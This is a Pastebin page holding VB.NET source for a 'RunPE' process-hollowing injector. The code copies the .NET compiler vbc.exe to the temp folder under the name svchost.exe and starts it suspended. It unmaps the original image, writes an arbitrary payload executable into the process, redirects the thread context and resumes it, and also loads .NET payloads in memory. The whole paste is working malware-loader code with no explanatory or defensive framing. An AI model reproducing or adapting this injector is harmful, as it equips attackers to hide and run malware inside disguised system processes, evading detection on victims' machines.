API tools faq
paste
Advertisement
Guest User

RunPE (VB.NET)

a guest
Jan 22nd, 2013
1,328
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
VB.NET 8.42 KB | None | 0 0
raw download clone embed print report
  1. Imports System.Reflection
  2. Imports System.Runtime.InteropServices
  3. Imports System.Text
  4.  
  5. Public Class Form1
  6.  
  7.     Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  8.         Dim fFile() As Byte
  9.         fFile = FileIO.FileSystem.ReadAllBytes("C:\1.exe")
  10.         Inject(fFile, True, "C:\windows\system32\notepad.exe")
  11.     End Sub
  12.  
  13.     Public Declare Function ShellExecuteA Lib "Shell32" (ByVal Parent As IntPtr, ByVal OperationType As String, ByVal FileLocation As String, ByVal Parameters As String, ByVal StartDirectory As String, ByVal ShowType As Integer) As Integer
  14.     Public Declare Function LoadLibraryA Lib "kernel32" (ByVal name As String) As IntPtr
  15.     Public Declare Function GetProcAddress Lib "kernel32" (ByVal handle As IntPtr, ByVal name As String) As IntPtr
  16.     Public Shared Function CreateAPI(Of T)(ByVal name As String, ByVal method As String) As T
  17.         Return DirectCast(DirectCast(Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), GetType(T)), Object), T)
  18.     End Function
  19.     Public Delegate Function a(ByVal hThr As IntPtr, ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  20.     Public Delegate Function b(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByVal buff() As Byte, ByVal size As IntPtr, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  21.     Public Delegate Function c(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr) As UInteger
  22.     Public Delegate Function d(ByVal hProc As IntPtr, ByVal baseAddr As IntPtr, ByRef bufr As IntPtr, ByVal bufrSize As IntPtr, ByRef numRead As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  23.     Public Delegate Function f(ByVal hThr As IntPtr) As Integer
  24.     Public Delegate Function g(ByVal hThr As IntPtr, ByVal ctxt() As UInteger) As <MarshalAs(UnmanagedType.Bool)> Boolean
  25.     Public Delegate Function h(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal allocType As Integer, ByVal prot As Integer) As IntPtr
  26.     Public Delegate Function i(ByVal hProc As IntPtr, ByVal addr As IntPtr, ByVal size As IntPtr, ByVal newProt As Integer, ByRef oldProt As Integer) As <MarshalAs(UnmanagedType.Bool)> Boolean
  27.     Private Shared ReadOnly prot As Integer() = New Integer() {1, &H10, 2, &H20, 4, &H40, 4, &H40}
  28.     <DllImport("kernel32")> Shared Function CreateProcess(ByVal appName As String, ByVal commandLine As StringBuilder, _
  29.       ByVal procAttr As IntPtr, ByVal thrAttr As IntPtr, <MarshalAs(UnmanagedType.Bool)> ByVal inherit As Boolean, _
  30.       ByVal creation As Integer, ByVal env As IntPtr, ByVal curDir As String, ByVal sInfo() As Byte, _
  31.       ByVal pInfo() As IntPtr) As <MarshalAs(UnmanagedType.Bool)> Boolean
  32.     End Function
  33.     Public Shared Function Inject(ByVal bytes() As Byte, ByVal runInMemory As Boolean, Optional ByVal filename As String = Nothing)
  34.         Dim GTC As a = CreateAPI(Of a)("kernel32", "GetThreadContext")
  35.         Dim WPM As b = CreateAPI(Of b)("kernel32", "WriteProcessMemory")
  36.         Dim NMVS As c = CreateAPI(Of c)("ntdll", "NtUnmapViewOfSection")
  37.         Dim RPM As d = CreateAPI(Of d)("kernel32", "ReadProcessMemory")
  38.         Dim RT As f = CreateAPI(Of f)("kernel32", "ResumeThread")
  39.         Dim STC As g = CreateAPI(Of g)("kernel32", "SetThreadContext")
  40.         Dim VAE As h = CreateAPI(Of h)("kernel32", "VirtualAllocEx")
  41.         Dim VPE As i = CreateAPI(Of i)("kernel32", "VirtualProtectEx")
  42.         Dim directory As String = IO.Path.GetTempPath
  43.         Try
  44.             Try
  45.                 IO.File.Copy(IO.Path.GetDirectoryName(Environment.SystemDirectory) & "\Microsoft.NET\Framework\v2.0.50727\vbc.exe", directory & "xcoca.ine", True)
  46.                 My.Computer.FileSystem.RenameFile(directory & "xcoca.ine", "svchost.exe")
  47.             Catch
  48.                 Exit Try
  49.             End Try
  50.             If Not runInMemory Then
  51.                 IO.File.WriteAllBytes(directory & filename, bytes)
  52.                 ShellExecuteA(0, "open", directory & filename, vbNullString, vbNullString, 10)
  53.             Else
  54.                 If NetRun.isDotNet(bytes) Then
  55.                     NetRun.RunNet(bytes)
  56.                 Else
  57.                     Dim procAttr As IntPtr = IntPtr.Zero
  58.                     Dim processInfo As IntPtr() = New IntPtr(3) {}
  59.                     Dim startupInfo As Byte() = New Byte(67) {}
  60.  
  61.                     Dim num2 As Integer = BitConverter.ToInt32(bytes, 60)
  62.                     Dim num As Integer = BitConverter.ToInt16(bytes, num2 + 6)
  63.                     Dim ptr4 As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H54))
  64.  
  65.                     If CreateProcess(Nothing, New StringBuilder(directory & "svchost.exe"), procAttr, procAttr, False, 4, _
  66.                      procAttr, Nothing, startupInfo, processInfo) Then
  67.                         Dim ctxt As UInteger() = New UInteger(178) {}
  68.                         ctxt(0) = &H10002
  69.                         If GTC(processInfo(1), ctxt) Then
  70.                             Dim baseAddr As New IntPtr(ctxt(&H29) + 8L)
  71.  
  72.                             Dim buffer__1 As IntPtr = IntPtr.Zero
  73.                             Dim bufferSize As New IntPtr(4)
  74.  
  75.                             Dim numRead As IntPtr = IntPtr.Zero
  76.  
  77.                             If RPM(processInfo(0), baseAddr, buffer__1, CInt(bufferSize), numRead) AndAlso (NMVS(processInfo(0), buffer__1) = 0) Then
  78.                                 Dim addr As New IntPtr(BitConverter.ToInt32(bytes, num2 + &H34))
  79.                                 Dim size As New IntPtr(BitConverter.ToInt32(bytes, num2 + 80))
  80.                                 Dim lpBaseAddress As IntPtr = VAE(processInfo(0), addr, size, &H3000, &H40)
  81.  
  82.                                 Dim lpNumberOfBytesWritten As Integer
  83.  
  84.                                 WPM(processInfo(0), lpBaseAddress, bytes, CUInt(CInt(ptr4)), lpNumberOfBytesWritten)
  85.                                 Dim num5 As Integer = num - 1
  86.                                 For i As Integer = 0 To num5
  87.                                     Dim dst As Integer() = New Integer(9) {}
  88.                                     Buffer.BlockCopy(bytes, (num2 + &HF8) + (i * 40), dst, 0, 40)
  89.                                     Dim buffer2 As Byte() = New Byte((dst(4) - 1)) {}
  90.                                     Buffer.BlockCopy(bytes, dst(5), buffer2, 0, buffer2.Length)
  91.  
  92.                                     size = New IntPtr(lpBaseAddress.ToInt32() + dst(3))
  93.                                     addr = New IntPtr(buffer2.Length)
  94.  
  95.                                     WPM(processInfo(0), size, buffer2, CUInt(addr), lpNumberOfBytesWritten)
  96.                                 Next
  97.                                 size = New IntPtr(ctxt(&H29) + 8L)
  98.                                 addr = New IntPtr(4)
  99.  
  100.                                 WPM(processInfo(0), size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), CUInt(addr), lpNumberOfBytesWritten)
  101.                                 ctxt(&H2C) = CUInt(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40))
  102.                                 STC(processInfo(1), ctxt)
  103.                             End If
  104.                         End If
  105.                         RT(processInfo(1))
  106.                     End If
  107.                 End If
  108.             End If
  109.         Catch
  110.             Return False
  111.         End Try
  112.         Return True
  113.     End Function
  114. End Class
  115. Public Class NetRun
  116.     Shared Sub RunNet(ByVal datatorun As Byte())
  117.         Dim netthread As New System.Threading.Thread(AddressOf RunNet)
  118.         netthread.SetApartmentState(System.Threading.ApartmentState.STA)
  119.         netthread.Start(datatorun)
  120.     End Sub
  121.     Shared Sub RunNet(ByVal netobject As Object)
  122.         Dim netthread As System.Reflection.MethodInfo = System.Reflection.Assembly.Load(DirectCast(netobject, Byte())).EntryPoint
  123.         Dim ObjectList As New System.Collections.Generic.List(Of String)
  124.         Dim ObjectList2 As New System.Collections.Generic.List(Of String())
  125.         Dim Object1 As Object
  126.         Dim integer1 As Integer = 0
  127.         For integer1 = 1 To netthread.GetParameters.Length
  128.             ObjectList.Add(integer1.ToString)
  129.         Next
  130.         ObjectList2.Add(ObjectList.ToArray)
  131.         Object1 = ObjectList2.ToArray
  132.         netthread.Invoke(Nothing, Object1)
  133.     End Sub
  134.     Shared Function isDotNet(ByVal bytesdotnet As Byte()) As Boolean
  135.         Try
  136.             Assembly.Load(bytesdotnet)
  137.             Return True
  138.         Catch
  139.             Return False
  140.         End Try
  141.     End Function
  142. End Class
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!